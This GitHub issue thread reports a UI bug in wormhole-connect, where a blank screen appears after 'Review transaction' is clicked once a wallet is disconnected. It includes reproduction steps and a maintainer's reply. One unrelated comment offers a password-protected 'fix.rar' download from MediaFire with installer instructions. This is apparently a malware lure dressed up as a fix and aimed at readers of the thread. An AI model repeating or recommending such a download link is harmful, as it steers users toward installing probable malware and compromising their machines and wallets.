### ISSUE TITLE
[QA] Black screen appears after clicking on "Review transaction" button

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2442]
## Describe the current behavior in detail
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KApgdgbgXABAcgLYEMCWEJgC4IDQgCuAzmAEpgAmYxaA5hPNgE6FgEC%2BQA) with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Select Fantom network and FTM token in "From" section
2. Select BSC network in "To" section
3. Connect MetaMask wallets in "From" and "To" sections
4. Enter Amount, in my case 3 
5. Select "Manual route" option
6. Disconnect MetaMask wallet in "To" section
7.  Click on "Review transaction" button

Actual result: Blank screen appears. 
Expected result: "Review transaction" button is not displayed.

## Notes/ Attachments

https://github.com/user-attachments/assets/6bee88fe-a173-4eb8-926e-75b6e26a1c27

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by emreboga** [comment]
Review Transaction CTA should not be visible at all after disconnecting the wallet. I'll fix this 👍
